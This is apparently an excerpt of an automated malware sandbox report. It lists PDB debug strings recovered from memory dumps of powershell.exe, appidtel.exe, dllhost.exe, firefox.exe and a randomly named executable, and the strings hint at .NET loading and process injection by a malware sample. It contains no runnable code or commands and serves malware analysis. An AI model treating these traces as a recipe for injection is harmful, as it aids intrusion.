Source: Binary string: wntdll.pdb source: appidtel.exe, appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdb source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb('D>'D 0'D_CorDllMainmscoree.dll source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: appidtel.exe, 00000005.00000002.2743860674.00000000033AE000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000002.2743860674.0000000003210000.00000040.00001000.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2649455449.0000000002EB1000.00000004.00000020.00020000.00000000.sdmp, appidtel.exe, 00000005.00000003.2651749861.0000000003067000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2743752140.0000000003486000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.000000000397E000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3412398203.00000000037E0000.00000040.00001000.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000003.2745671779.000000000363A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000004.00000002.2390923201.00007FFD349B0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: QEwzeZKCXN.exe, 0000000A.00000002.3409362566.000000000013E000.00000002.00000001.01000000.00000006.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808153383.000000000013E000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: appidtel.pdbGCTL source: dllhost.exe, 0000000B.00000002.3410035281.0000000003392000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 0000000B.00000002.3413640023.0000000003E0C000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000000.2808888776.0000000002FAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.3042550015.000000000A11C000.00000004.80000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dllhost.pdb source: appidtel.exe, 00000005.00000002.2743775767.0000000002DB8000.00000004.00000020.00020000.00000000.sdmp, QEwzeZKCXN.exe, 0000000A.00000002.3410625566.0000000001198000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000004.00000002.2282559489.000001FEB5F49000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2360447167.000001FEBE410000.00000004.08000000.00040000.00000000.sdmp
